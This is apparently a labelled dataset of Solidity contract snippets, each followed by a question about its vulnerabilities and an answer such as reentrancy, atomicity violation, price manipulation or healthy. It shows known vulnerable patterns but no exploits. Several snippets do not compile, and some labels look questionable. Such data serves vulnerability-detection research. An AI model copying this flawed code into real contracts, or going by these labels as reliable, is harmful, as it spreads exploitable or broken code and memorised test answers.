37     assembly { length := extcodesize(_addr) }
38     return length > 0;
39   }
40 
41 }
42 
43 contract Ctoken{
44     function transfer(address _to, uint256 _value) public returns (bool) {
45         require(super. Transfer(_to, _value));
46         callAfterTransfer(msg.sender, _to, _value);
47         return true;
48     }
49  
50  function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
51         require(super.transferFrom(_from, _to, _value));
52         callAfterTransfer(_from, _to, _value);
53         return true;
54     }
55  
56  function callAfterTransfer(address _from, address _to, uint256 _value) internal {
57         if (AddressUtils.isContract(_to) && !contractFallback(_from, _to, _value, new bytes(0))) {
58             require(!isBridge(_to));
59             emit ContractFallbackCallFailed(_from, _to, _value);
60         }
61     }
62  
63  function isBridge(address _address) public view returns (bool) {
64         return _address == bridgeContractAddr;
65     }
66  
67  
68  function contractFallback(address _from, address _to, uint256 _value, bytes _data) private returns (bool) {
69         return _to.call(abi.encodeWithSelector(ON_TOKEN_TRANSFER, _from, _value, _data));
70     }
71 }
What are the vulnerabilities in the contract?
reentrancy
atomicity violation
<end of text>
1 pragma solidity ^0.4.11;
2 
3 
4 import "./token/ERC677.sol";
5 import "./token/ERC677Receiver.sol";
6 
7 
8 contract ERC677Token is ERC677 {
9 
10   function transferAndCall(address _to, uint _value, bytes _data)
11     public
12     returns (bool success)
13   {
14     super.transfer(_to, _value);
15     Transfer(msg.sender, _to, _value, _data);
16     if (isContract(_to)) {
17       contractFallback(_to, _value, _data);
18     }
19     return true;
20   }
21 
22 
23   // PRIVATE
24 
25   function contractFallback(address _to, uint _value, bytes _data)
26     private
27   {
28     ERC677Receiver receiver = ERC677Receiver(_to);
29     receiver.onTokenTransfer(msg.sender, _value, _data);
30   }
31 
32   function isContract(address _addr)
33     private
34     returns (bool hasCode)
35   {
36     uint length;
37     assembly { length := extcodesize(_addr) }
38     return length > 0;
39   }
40 
41 }
42 
43 contract Ctoken{
44     function transfer(address _to, uint256 _value) public returns (bool) {
45         require(superTransfer(_to, _value));
46         callAfterTransfer(msg.sender, _to, _value);
47         return true;
48     }
49  
50  function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
51         require(super.transferFrom(_from, _to, _value));
52         callAfterTransfer(_from, _to, _value);
53         return true;
54     }
55  
56  function callAfterTransfer(address _from, address _to, uint256 _value) internal {
57         if (AddressUtils.isContract(_to) && !contractFallback(_from, _to, _value, new bytes(0))) {
58             require(!isBridge(_to));
59             emit ContractFallbackCallFailed(_from, _to, _value);
60         }
61     }
62  
63  function isBridge(address _address) public view returns (bool) {
64         return _address == bridgeContractAddr;
65     }
66  
67  
68  function contractFallback(address _from, address _to, uint256 _value, bytes _data) private returns (bool) {
69         return _to.call(abi.encodeWithSelector(ON_TOKEN_TRANSFER, _from, _value, _data));
70     }
71 }
What are the vulnerabilities in the contract?
atomicity violation 
<end of text>
1 pragma solidity ^0.4.11;
2 
3 
4 contract Ctoken{
5     function transfer(address _to, uint256 _value) public returns (bool) {
6         require(superTransfer(_to, _value));
7         callAfterTransfer(msg.sender, _to, _value);
8         return true;
9     }
10  
11  function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
12         require(super.transferFrom(_from, _to, _value));
13         callAfterTransfer(_from, _to, _value);
14         return true;
15     }
16  
17  
18  function contractFallback(address _from, address _to, uint256 _value, bytes _data) private returns (bool) {
19         return _to.call(abi.encodeWithSelector(ON_TOKEN_TRANSFER, _from, _value, _data));
20     }
21 }
What are the vulnerabilities in the contract?
reentrancy
<end of text>
1 // SPDX-License-Identifier: MIT
2 
3 pragma solidity ^0.8.0;
4 
5 contract WUSDMaster{
6 
7         function stake(uint256 amount) external nonReentrant {
8         require(amount <= maxStakeAmount, 'amount too high');
9         usdt.safeTransferFrom(msg.sender, address(this), amount);
10         if(feePermille > 0) {
11             uint256 feeAmount = amount * feePermille / 1000;
12             usdt.safeTransfer(treasury, feeAmount);
13             amount = amount - feeAmount;
14         }
15         uint256 wexAmount = amount * wexPermille / 1000;
16         usdt.approve(address(wswapRouter), wexAmount);
17         wswapRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(
18             wexAmount,
19             0,
20             swapPath,
21             address(this),
22             block.timestamp
23         );
24         wusd.mint(msg.sender, amount);
25         
26         emit Stake(msg.sender, amount);
27     }
28 
29 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.8.0;
3 
4 contract WUSDMaster is Ownable, Withdrawable, ReentrancyGuard {
5     using SafeERC20 for IERC20;
6     
7     IWUSD public immutable wusd;
8     IERC20 public usdt;
9     IERC20 public wex;
10     IWswapRouter public immutable wswapRouter;
11     address public treasury;
12     address public strategist;
13     
14     address[] public swapPath;
15     
16     uint public wexPermille = 100;
17     uint public treasuryPermille = 7;
18     uint public feePermille = 0;
19     
20     uint256 public maxStakeAmount;
21     
22     event Stake(address indexed user, uint256 amount);
23     event Redeem(address indexed user, uint256 amount);
24     event UsdtWithdrawn(uint256 amount);
25     event WexWithdrawn(uint256 amount);
26     event SwapPathChanged(address[] swapPath);
27     event WexPermilleChanged(uint256 wexPermille);
28     event TreasuryPermilleChanged(uint256 treasuryPermille);
29     event FeePermilleChanged(uint256 feePermille);
30     event TreasuryAddressChanged(address treasury);
31     event StrategistAddressChanged(address strategist);
32     event MaxStakeAmountChanged(uint256 maxStakeAmount);
33     
34     constructor(IWUSD _wusd, IERC20 _usdt, IERC20 _wex, IWswapRouter _wswapRouter, address _treasury, uint256 _maxStakeAmount) {
35         require(
36             address(_wusd) != address(0) &&
37             address(_usdt) != address(0) &&
38             address(_wex) != address(0) &&
39             address(_wswapRouter) != address(0) &&
40             _treasury != address(0),
41             "zero address in constructor"
42         );
43         wusd = _wusd;
44         usdt = _usdt;
45         wex = _wex;
46         wswapRouter = _wswapRouter;
47         treasury = _treasury;
48         swapPath = [address(usdt), address(wex)];
49         maxStakeAmount = _maxStakeAmount;
50     }
51     
52     function stake(uint256 amount) external nonReentrant {
53         require(amount <= maxStakeAmount, 'amount too high');
54         usdt.safeTransferFrom(msg.sender, address(this), amount);
55         if(feePermille > 0) {
56             uint256 feeAmount = amount * feePermille / 1000;
57             usdt.safeTransfer(treasury, feeAmount);
58             amount = amount - feeAmount;
59         }
60         uint256 wexAmount = amount * wexPermille / 1000;
61         usdt.approve(address(wswapRouter), wexAmount);
62         wswapRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(
63             wexAmount,
64             0,
65             swapPath,
66             address(this),
67             block.timestamp
68         );
69         wusd.mint(msg.sender, amount);
70         
71         emit Stake(msg.sender, amount);
72     }
73 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: MIT
2 pragma solidity ^0.6.12;
3 pragma experimental ABIEncoderV2;
4 
5 
6 
7 contract PancakeSwap is IStrategy, RewardsDistributionRecipient, ReentrancyGuard, Pausable {
8     using SafeMath for uint256;
9     using SafeBEP20 for IBEP20;
10 
11  
12     ICakeVault public rewardsToken;
13     IBEP20 public stakingToken;
14     uint256 public periodFinish = 0;
15     uint256 public rewardRate = 0;
16     uint256 public rewardsDuration = 2 hours;
17     uint256 public lastUpdateTime;
18     uint256 public rewardPerTokenStored;
19 
20     mapping(address => uint256) public userRewardPerTokenPaid;
21     mapping(address => uint256) public rewards;
22 
23     uint256 private _totalSupply;
24     mapping(address => uint256) private _balances;
25 
26     address private constant CAKE = 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82;
27     IMasterChef private constant CAKE_MASTER_CHEF = IMasterChef(0x73feaa1eE314F8c655E354234017bE2193C9E24E);
28     uint public poolId;
29     address public keeper = 0x793074D9799DC3c6039F8056F1Ba884a73462051;
30     mapping (address => uint) public depositedAt;
31 
32 
33     IStrategyHelper public helper = IStrategyHelper(0x154d803C328fFd70ef5df52cb027d82821520ECE);
34     IBunnyMinter public minter;
35 
36 
37 
38     constructor(uint _pid) public {
39         (address _token,,,) = CAKE_MASTER_CHEF.poolInfo(_pid);
40         stakingToken = IBEP20(_token);
41         stakingToken.safeApprove(address(CAKE_MASTER_CHEF), uint(~0));
42         poolId = _pid;
43 
44         rewardsDistribution = msg.sender;
45         setMinter(IBunnyMinter(0x0B4A714AAf59E46cb1900E3C031017Fd72667EfE));
46         setRewardsToken(0x9a8235aDA127F6B5532387A029235640D1419e8D);
47     }
48 
49     function totalSupply() external view returns (uint256) {
50         return _totalSupply;
51     }
52 
53     function balance() override external view returns (uint) {
54         return _totalSupply;
55     }
56 
57     function balanceOf(address account) override external view returns (uint256) {
58         return _balances[account];
59     }
60 
61     function principalOf(address account) override external view returns (uint256) {
62         return _balances[account];
63     }
64 
65     function withdrawableBalanceOf(address account) override public view returns (uint) {
66         return _balances[account];
67     }
68 
69     function profitOf(address account) override public view returns (uint _usd, uint _bunny, uint _bnb) {
70         uint cakeVaultPrice = rewardsToken.priceShare();
71         uint _earned = earned(account);
72         uint amount = _earned.mul(cakeVaultPrice).div(1e18);
73 
74         if (address(minter) != address(0) && minter.isMinter(address(this))) {
75             uint performanceFee = minter.performanceFee(amount);
76             // cake amount
77             _usd = amount.sub(performanceFee);
78 
79             uint bnbValue = helper.tvlInBNB(CAKE, performanceFee);
80             // bunny amount
81             _bunny = minter.amountBunnyToMint(bnbValue);
82         } else {
83             _usd = amount;
84             _bunny = 0;
85         }
86 
87         _bnb = 0;
88     }
89 
90     function tvl() override public view returns (uint) {
91         uint stakingTVL = helper.tvl(address(stakingToken), _totalSupply);
92 
93         uint price = rewardsToken.priceShare();
94         uint earned = rewardsToken.balanceOf(address(this)).mul(price).div(1e18);
95         uint rewardTVL = helper.tvl(CAKE, earned);
96 
97         return stakingTVL.add(rewardTVL);
98     }
99 
100     function tvlStaking() external view returns (uint) {
101         return helper.tvl(address(stakingToken), _totalSupply);
102     }
103 
104     function tvlReward() external view returns (uint) {
105         uint price = rewardsToken.priceShare();
106         uint earned = rewardsToken.balanceOf(address(this)).mul(price).div(1e18);
107         return helper.tvl(CAKE, earned);
108     }
109 
110     function apy() override public view returns(uint _usd, uint _bunny, uint _bnb) {
111         uint dailyAPY = helper.compoundingAPY(poolId, 365 days).div(365);
112 
113         uint cakeAPY = helper.compoundingAPY(0, 1 days);
114         uint cakeDailyAPY = helper.compoundingAPY(0, 365 days).div(365);
115 
116     
117 
118         _usd = dailyAPY.mul(cakeAPY).div(cakeDailyAPY);
119         _bunny = 0;
120         _bnb = 0;
121     }
122 
123     function lastTimeRewardApplicable() public view returns (uint256) {
124         return Math.min(block.timestamp, periodFinish);
125     }
126 
127     function rewardPerToken() public view returns (uint256) {
128         if (_totalSupply == 0) {
129             return rewardPerTokenStored;
130         }
131         return
132         rewardPerTokenStored.add(
133             lastTimeRewardApplicable().sub(lastUpdateTime).mul(rewardRate).mul(1e18).div(_totalSupply)
134         );
135     }
136 
137     function earned(address account) public view returns (uint256) {
138         return _balances[account].mul(rewardPerToken().sub(userRewardPerTokenPaid[account])).div(1e18).add(rewards[account]);
139     }
140 
141     function getRewardForDuration() external view returns (uint256) {
142         return rewardRate.mul(rewardsDuration);
143     }
144 
145     function _deposit(uint256 amount, address _to) private nonReentrant notPaused updateReward(_to) {
146         require(amount > 0, "amount");
147         _totalSupply = _totalSupply.add(amount);
148         _balances[_to] = _balances[_to].add(amount);
149         depositedAt[_to] = block.timestamp;
150         stakingToken.safeTransferFrom(msg.sender, address(this), amount);
151         CAKE_MASTER_CHEF.deposit(poolId, amount);
152         emit Staked(_to, amount);
153 
154         _harvest();
155     }
156 
157     function deposit(uint256 amount) override public {
158         _deposit(amount, msg.sender);
159     }
160 
161     function depositAll() override external {
162         deposit(stakingToken.balanceOf(msg.sender));
163     }
164 
165     function withdraw(uint256 amount) override public nonReentrant updateReward(msg.sender) {
166         require(amount > 0, "amount");
167         _totalSupply = _totalSupply.sub(amount);
168         _balances[msg.sender] = _balances[msg.sender].sub(amount);
169         CAKE_MASTER_CHEF.withdraw(poolId, amount);
170 
171         if (address(minter) != address(0) && minter.isMinter(address(this))) {
172             uint _depositedAt = depositedAt[msg.sender];
173             uint withdrawalFee = minter.withdrawalFee(amount, _depositedAt);
174             if (withdrawalFee > 0) {
175                 uint performanceFee = withdrawalFee.div(100);
176                 minter.mintFor(address(stakingToken), withdrawalFee.sub(performanceFee), performanceFee, msg.sender, _depositedAt);
177                 amount = amount.sub(withdrawalFee);
178             }
179         }
180 
181         stakingToken.safeTransfer(msg.sender, amount);
182         emit Withdrawn(msg.sender, amount);
183 
184         _harvest();
185     }
186 
187     function withdrawAll() override external {
188         uint _withdraw = withdrawableBalanceOf(msg.sender);
189         if (_withdraw > 0) {
190             withdraw(_withdraw);
191         }
192         getReward();
193     }
194 
195     function getReward() override public nonReentrant updateReward(msg.sender) {
196         uint256 reward = rewards[msg.sender];
197         if (reward > 0) {
198             rewards[msg.sender] = 0;
199             rewardsToken.withdraw(reward);
200             uint cakeBalance = IBEP20(CAKE).balanceOf(address(this));
201 
202             if (address(minter) != address(0) && minter.isMinter(address(this))) {
203                 uint performanceFee = minter.performanceFee(cakeBalance);
204                 minter.mintFor(CAKE, 0, performanceFee, msg.sender, depositedAt[msg.sender]);
205                 cakeBalance = cakeBalance.sub(performanceFee);
206             }
207 
208             IBEP20(CAKE).safeTransfer(msg.sender, cakeBalance);
209             emit RewardPaid(msg.sender, cakeBalance);
210         }
211     }
212  }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1  // SPDX-License-Identifier: MIT
2  pragma solidity >=0.4.24 <0.6.0;
3 
4  contract Lottery {
5 
6          mapping (address => mapping(uint64 => uint))
7          public tickets;
8          uint64 winningId; 
9          bool drawingPhase; 
10          }
11          function reset() external{
12                 delete tickets;
13                 winningId = 0; 
14                 drawingPhase = false;
15         }
16 
17         function buy(uint64 id, uint amount) external {
18             require(winningId == 0, "already drawn");
19             receivePayment(msg.sender, amount),
20             tickets[msg.sender][id] += amount;
21             }
22 
23         function enterDrawingPhase() external {
24                 drawingPhase = true;
25         }
26 
27          function draw(uint64 id) external {
28                  require(winningId == 0, "already drawn");
29                  require(id != 0, "invalid winning number");
30                  winningId = id;
31          }
32          function claimReward() external {
33                 require(winningId != 0, "not drawn");
34                }
35          function multiBuy(uint[] ids, uint[] amounts)
36          external {
37                  require(winningId == 0, "already drawn");
38                  uint totalAmount = 0;
39                  for (int i = 0; i < ids.length; i++) {
40                  tickets[msg.sender][ids[i]] += amounts[i];
41                  totalAmount += amounts[i];
42          }
43               receivePayment(msg.sender, totalAmount);
44          }
45 }
What are the vulnerabilities in the contract?
atomicity violation
<end of text>
1 // SPDX-License-Identifier: MIT
2  pragma solidity >=0.4.24 <0.6.0;
3 
4 contract testlock {
5             
6          function test_lock(
7                  uint lock,
8                  uint newLock,
9                  uint amount
10                  ) external {
11 
12                  require(amount >= allLocks[lock].depositAmount, 'wrong amount');
13                  memory config = allLocks[lock];
14                  config.depositAmount = amount;
15                  if(newLock != 0) {
16                      mapLocktoToken(newLock, config);
17                  }           
18                }
19   } 
What are the vulnerabilities in the contract?
atomicity violation
business logic flaw
<end of text>
1 // SPDX-License-Identifier: GPL-3.0-or-later
2 
3 pragma solidity >=0.8.0;
4 
5 
6 contract ConcentratedLiquidityPool is IPool {
7     using Ticks for mapping(int24 => Ticks.Tick);
8 
9     event Mint(address indexed sender, uint256 amount0, uint256 amount1, address indexed recipient);
10     event Burn(address indexed sender, uint256 amount0, uint256 amount1, address indexed recipient);
11     event Collect(address indexed sender, uint256 amount0, uint256 amount1);
12     event Sync(uint256 reserveShares0, uint256 reserveShares1);
13 
14     /// @dev References for tickSpacing:
15     // 100 tickSpacing -> 2% between ticks.
16     bytes32 public constant override poolIdentifier = "Trident:ConcentratedLiquidity";
17 
18     uint24 internal constant MAX_FEE = 100000; /// @dev Maximum `swapFee` is 10%.
19 
20     uint128 internal immutable MAX_TICK_LIQUIDITY;
21     uint24 internal immutable tickSpacing;
22     uint24 internal immutable swapFee; /// @dev 1000 corresponds to 0.1% fee. Fee is measured in pips.
23 
24     address internal immutable barFeeTo;
25     IBentoBoxMinimal internal immutable bento;
26     IMasterDeployer internal immutable masterDeployer;
27 
28     address internal immutable token0;
29     address internal immutable token1;
30 
31     uint128 public liquidity;
32 
33     uint160 internal secondsPerLiquidity; /// @dev Multiplied by 2^128.
34     uint32 internal lastObservation;
35 
36     uint256 public feeGrowthGlobal0; /// @dev All fee growth counters are multiplied by 2^128.
37     uint256 public feeGrowthGlobal1;
38 
39     uint256 public barFee;
40 
41     uint128 internal token0ProtocolFee;
42     uint128 internal token1ProtocolFee;
43 
44     uint128 internal reserve0; /// @dev `bento` share balance tracker.
45     uint128 internal reserve1;
46 
47     uint160 internal price; /// @dev Sqrt of price aka. √(y/x), multiplied by 2^96.
48     int24 internal nearestTick; /// @dev Tick that is just below the current price.
49 
50     uint256 internal unlocked;
51     modifier lock() {
52         require(unlocked == 1, "LOCKED");
53         unlocked = 2;
54         _;
55         unlocked = 1;
56     }
57 
58     mapping(int24 => Ticks.Tick) public ticks;
59     mapping(address => mapping(int24 => mapping(int24 => Position))) public positions;
60 
61     struct Position {
62         uint128 liquidity;
63         uint256 feeGrowthInside0Last;
64         uint256 feeGrowthInside1Last;
65     }
66 
67     struct SwapCache {
68         uint256 feeAmount;
69         uint256 totalFeeAmount;
70         uint256 protocolFee;
71         uint256 feeGrowthGlobal;
72         uint256 currentPrice;
73         uint256 currentLiquidity;
74         uint256 input;
75         int24 nextTickToCross;
76     }
77 
78     struct MintParams {
79         int24 lowerOld;
80         int24 lower;
81         int24 upperOld;
82         int24 upper;
83         uint256 amount0Desired;
84         uint256 amount1Desired;
85         bool token0native;
86         bool token1native;
87         /// @dev To mint an NFT the positionOwner should be set to the positionManager contract.
88         address positionOwner;
89         /// @dev When minting through the positionManager contract positionRecipient should be the NFT recipient.
90         //    It can be set to address(0) if we are not minting through the positionManager contract.
91         address positionRecipient;
92     }
93 
94     /// @dev Only set immutable variables here - state changes made here will not be used.
95     constructor(bytes memory _deployData, IMasterDeployer _masterDeployer) {
96         (address _token0, address _token1, uint24 _swapFee, uint160 _price, uint24 _tickSpacing) = abi.decode(
97             _deployData,
98             (address, address, uint24, uint160, uint24)
99         );
100 
101         require(_token0 != address(0), "ZERO_ADDRESS");
102         require(_token0 != address(this), "INVALID_TOKEN0");
103         require(_token1 != address(this), "INVALID_TOKEN1");
104         require(_swapFee <= MAX_FEE, "INVALID_SWAP_FEE");
105         
106         token0 = _token0;
107         token1 = _token1;
108         swapFee = _swapFee;
109         price = _price;
110         tickSpacing = _tickSpacing;
111         /// @dev Prevents global liquidity overflow in the case all ticks are initialised.
112         MAX_TICK_LIQUIDITY = Ticks.getMaxLiquidity(_tickSpacing);
113         ticks[TickMath.MIN_TICK] = Ticks.Tick(TickMath.MIN_TICK, TickMath.MAX_TICK, uint128(0), 0, 0, 0);
114         ticks[TickMath.MAX_TICK] = Ticks.Tick(TickMath.MIN_TICK, TickMath.MAX_TICK, uint128(0), 0, 0, 0);
115         nearestTick = TickMath.MIN_TICK;
116         bento = IBentoBoxMinimal(_masterDeployer.bento());
117         barFeeTo = _masterDeployer.barFeeTo();
118         barFee = _masterDeployer.barFee();
119         masterDeployer = _masterDeployer;
120         unlocked = 1;
121     }
122 
123     function burn(bytes calldata data) public override lock returns (IPool.TokenAmount[] memory withdrawnAmounts) {
124         (int24 lower, int24 upper, uint128 amount, address recipient, bool unwrapBento) = abi.decode(
125             data,
126             (int24, int24, uint128, address, bool)
127         );
128 
129         uint160 priceLower = TickMath.getSqrtRatioAtTick(lower);
130         uint160 priceUpper = TickMath.getSqrtRatioAtTick(upper);
131         uint160 currentPrice = price;
132 
133         unchecked {
134             if (priceLower < currentPrice && currentPrice < priceUpper) liquidity -= amount;
135         }
136 
137         (uint256 amount0, uint256 amount1) = _getAmountsForLiquidity(
138             uint256(priceLower),
139             uint256(priceUpper),
140             uint256(currentPrice),
141             uint256(amount)
142         );
143 
144         (uint256 amount0fees, uint256 amount1fees) = _updatePosition(msg.sender, lower, upper, -int128(amount));
145 
146         unchecked {
147             amount0 += amount0fees;
148             amount1 += amount1fees;
149         }
150 
151         withdrawnAmounts = new TokenAmount[](2);
152         withdrawnAmounts[0] = TokenAmount({token: token0, amount: amount0});
153         withdrawnAmounts[1] = TokenAmount({token: token1, amount: amount1});
154 
155         unchecked {
156             reserve0 -= uint128(amount0fees);
157             reserve1 -= uint128(amount1fees);
158         }
159 
160         _transferBothTokens(recipient, amount0, amount1, unwrapBento);
161 
162         nearestTick = Ticks.remove(ticks, lower, upper, amount, nearestTick);
163         emit Burn(msg.sender, amount0, amount1, recipient);
164     }
165 
166     function burnSingle(bytes calldata) public override returns (uint256) {
167         revert();
168     }
169 
170     function collect(
171         int24 lower,
172         int24 upper,
173         address recipient,
174         bool unwrapBento
175     ) public lock returns (uint256 amount0fees, uint256 amount1fees) {
176         (amount0fees, amount1fees) = _updatePosition(msg.sender, lower, upper, 0);
177 
178         _transferBothTokens(recipient, amount0fees, amount1fees, unwrapBento);
179 
180         reserve0 -= uint128(amount0fees);
181         reserve1 -= uint128(amount1fees);
182 
183         emit Collect(msg.sender, amount0fees, amount1fees);
184     }
185 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 // SPDX-License-Identifier: GPL-3.0-or-later
2 
3 pragma solidity >=0.8.0;
4 
5 
6 contract ConcentratedLiquidityPool is IPool {
7     using Ticks for mapping(int24 => Ticks.Tick);
8 
9     event Burn(address indexed sender, uint256 amount0, uint256 amount1, address indexed recipient);
10     event Sync(uint256 reserveShares0, uint256 reserveShares1);
11 
12  
13     bytes32 public constant override poolIdentifier = "Trident:ConcentratedLiquidity";
14 
15     uint24 internal constant MAX_FEE = 100000; 
16 
17     uint128 internal immutable MAX_TICK_LIQUIDITY;
18     uint24 internal immutable tickSpacing;
19     uint24 internal immutable swapFee;
20 
21     address internal immutable barFeeTo;
22     IBentoBoxMinimal internal immutable bento;
23     IMasterDeployer internal immutable masterDeployer;
24 
25     address internal immutable token0;
26     address internal immutable token1;
27 
28     uint128 public liquidity;
29 
30     uint160 internal secondsPerLiquidity; 
31     uint32 internal lastObservation;
32 
33     uint256 public feeGrowthGlobal0; 
34     uint256 public feeGrowthGlobal1;
35 
36     uint256 public barFee;
37 
38     uint128 internal token0ProtocolFee;
39     uint128 internal token1ProtocolFee;
40 
41     uint128 internal reserve0; 
42     uint128 internal reserve1;
43 
44     uint160 internal price; 
45     int24 internal nearestTick; 
46 
47     uint256 internal unlocked;
48     modifier lock() {
49         require(unlocked == 1, "LOCKED");
50         unlocked = 2;
51         _;
52         unlocked = 1;
53     }
54 
55     mapping(int24 => Ticks.Tick) public ticks;
56     mapping(address => mapping(int24 => mapping(int24 => Position))) public positions;
57 
58     struct Position {
59         uint128 liquidity;
60         uint256 feeGrowthInside0Last;
61         uint256 feeGrowthInside1Last;
62     }
63 
64     struct SwapCache {
65         uint256 feeAmount;
66         uint256 totalFeeAmount;
67         uint256 protocolFee;
68         uint256 feeGrowthGlobal;
69         uint256 currentPrice;
70         uint256 currentLiquidity;
71         uint256 input;
72         int24 nextTickToCross;
73     }
74 
75     struct MintParams {
76         int24 lowerOld;
77         int24 lower;
78         int24 upperOld;
79         int24 upper;
80         uint256 amount0Desired;
81         uint256 amount1Desired;
82         bool token0native;
83         bool token1native;
84         address positionOwner;
85         address positionRecipient;
86     }
87 
88     constructor(bytes memory _deployData, IMasterDeployer _masterDeployer) {
89         (address _token0, address _token1, uint24 _swapFee, uint160 _price, uint24 _tickSpacing) = abi.decode(
90             _deployData,
91             (address, address, uint24, uint160, uint24)
92         );
93 
94         require(_token0 != address(0), "ZERO_ADDRESS");
95         require(_token0 != address(this), "INVALID_TOKEN0");
96         require(_token1 != address(this), "INVALID_TOKEN1");
97         require(_swapFee <= MAX_FEE, "INVALID_SWAP_FEE");
98         
99         token0 = _token0;
100         token1 = _token1;
101         swapFee = _swapFee;
102         price = _price;
103         tickSpacing = _tickSpacing;
104         MAX_TICK_LIQUIDITY = Ticks.getMaxLiquidity(_tickSpacing);
105         ticks[TickMath.MIN_TICK] = Ticks.Tick(TickMath.MIN_TICK, TickMath.MAX_TICK, uint128(0), 0, 0, 0);
106         ticks[TickMath.MAX_TICK] = Ticks.Tick(TickMath.MIN_TICK, TickMath.MAX_TICK, uint128(0), 0, 0, 0);
107         nearestTick = TickMath.MIN_TICK;
108         bento = IBentoBoxMinimal(_masterDeployer.bento());
109         barFeeTo = _masterDeployer.barFeeTo();
110         barFee = _masterDeployer.barFee();
111         masterDeployer = _masterDeployer;
112         unlocked = 1;
113     }
114 
115     function burn(bytes calldata data) public override lock returns (IPool.TokenAmount[] memory withdrawnAmounts) {
116         (int24 lower, int24 upper, uint128 amount, address recipient, bool unwrapBento) = abi.decode(
117             data,
118             (int24, int24, uint128, address, bool)
119         );
120 
121         uint160 priceLower = TickMath.getSqrtRatioAtTick(lower);
122         uint160 priceUpper = TickMath.getSqrtRatioAtTick(upper);
123         uint160 currentPrice = price;
124 
125         unchecked {
126             if (priceLower < currentPrice && currentPrice < priceUpper) liquidity -= amount;
127         }
128 
129         (uint256 amount0, uint256 amount1) = _getAmountsForLiquidity(
130             uint256(priceLower),
131             uint256(priceUpper),
132             uint256(currentPrice),
133             uint256(amount)
134         );
135 
136         (uint256 amount0fees, uint256 amount1fees) = _updatePosition(msg.sender, lower, upper, -int128(amount));
137 
138         unchecked {
139             amount0 += amount0fees;
140             amount1 += amount1fees;
141         }
142 
143         withdrawnAmounts = new TokenAmount[](2);
144         withdrawnAmounts[0] = TokenAmount({token: token0, amount: amount0});
145         withdrawnAmounts[1] = TokenAmount({token: token1, amount: amount1});
146 
147         unchecked {
148             reserve0 -= uint128(amount0fees);
149             reserve1 -= uint128(amount1fees);
150         }
151 
152         _transferBothTokens(recipient, amount0, amount1, unwrapBento);
153 
154         nearestTick = Ticks.remove(ticks, lower, upper, amount, nearestTick);
155         emit Burn(msg.sender, amount0, amount1, recipient);
156     }
157 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;

2 contract DoWhileLoop {

3     function testDoWhileLoop() public {
4         uint i = 1;
5         uint sum = 0;
6         do {
7             sum += i;
8             ++i;
9         } while (i < 1);
       
10     }

11 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity >=0.4.24 <0.6.0;
2 contract B {
3    function funcB() public pure returns (uint) {
4        return 42;
5    }
6    constructor() public {}
7 }

8 contract A {
9    function funcA1() public pure returns (uint) {
10        return 11;
11    }
12    function funcA2(uint x) public pure returns (uint) {
13        return x+1;
14    }
15    function funcA3() public returns (B) {
16        B retVal= new B();
17        return retVal;
18    }
19    constructor() public
20     {
21 	_;
22     }
23 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity ^0.4.24;


2 library Math {
    
3     function mul(uint256 a, uint256 b) internal pure returns (uint256) {
4         if (a == 0) {
5             return 0;
6         }
7         uint256 c = a * b;
8         assert(c / a == b);
9         return c;
10     }

11     function div(uint256 a, uint256 b) internal pure returns (uint256) {
12         return a / b;
13     }

14     function sub(uint256 a, uint256 b) internal pure returns (uint256) {
15         assert(b <= a);
16         return a - b;
17     }

18     function add(uint256 a, uint256 b) internal pure returns (uint256) {
19         uint256 c = a + b;
20         assert(c >= a);
21         return c;
22     }
23 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity ^0.4.21;

2 library SafeMath {


3   function mul(uint256 a, uint256 b) internal pure returns (uint256) {
4     if (a == 0) {
5       return 0;
6     }
7     uint256 c = a * b;
8     assert(c / a == b);
9     return c;
10   }

11   function div(uint256 a, uint256 b) internal pure returns (uint256) {

12     return a / b;
13   }


14   function sub(uint256 a, uint256 b) internal pure returns (uint256) {
15     assert(b <= a);
16     return a - b;
17   }


18   function add(uint256 a, uint256 b) internal pure returns (uint256) {
19     uint256 c = a + b;
20     assert(c >= a);
21     return c;
22   }
23 }


24 contract ERC20Basic {
25   function totalSupply() public view returns (uint256);
26   function balanceOf(address who) public view returns (uint256);
27   function transfer(address to, uint256 value) public returns (bool);
28   event Transfer(address indexed from, address indexed to, uint256 value);
29 }


30 contract ERC20 is ERC20Basic {
31   function allowance(address owner, address spender) public view returns (uint256);
32   function transferFrom(address from, address to, uint256 value) public returns (bool);
33   function approve(address spender, uint256 value) public returns (bool);
34   event Approval(address indexed owner, address indexed spender, uint256 value);
35 }


36 contract BasicToken is ERC20Basic {
37   using SafeMath for uint256;

38   mapping(address => uint256) balances;

39   uint256 totalSupply_;

40   function totalSupply() public view returns (uint256) {
41     return totalSupply_;
42   }

 
43   function transfer(address _to, uint256 _value) public returns (bool) {
44     require(_to != address(0));
45     require(_value <= balances[msg.sender]);

46     balances[msg.sender] = balances[msg.sender].sub(_value);
47     balances[_to] = balances[_to].add(_value);
48     emit Transfer(msg.sender, _to, _value);
49     return true;
50   }

 
51   function balanceOf(address _owner) public view returns (uint256 balance) {
52     return balances[_owner];
53   }

54 }


55 contract StandardToken is ERC20, BasicToken {

56   mapping (address => mapping (address => uint256)) internal allowed;


57   function transferFrom(address _from, address _to, uint256 _value) public returns (bool) {
58     require(_to != address(0));
59     require(_value <= balances[_from]);
60     require(_value <= allowed[_from][msg.sender]);

61     balances[_from] = balances[_from].sub(_value);
62     balances[_to] = balances[_to].add(_value);
63     allowed[_from][msg.sender] = allowed[_from][msg.sender].sub(_value);
64     emit Transfer(_from, _to, _value);
65     return true;
66   }

 
67   function approve(address _spender, uint256 _value) public returns (bool) {
68     allowed[msg.sender][_spender] = _value;
69     emit Approval(msg.sender, _spender, _value);
70     return true;
71   }


72   function allowance(address _owner, address _spender) public view returns (uint256) {
73     return allowed[_owner][_spender];
74   }

 
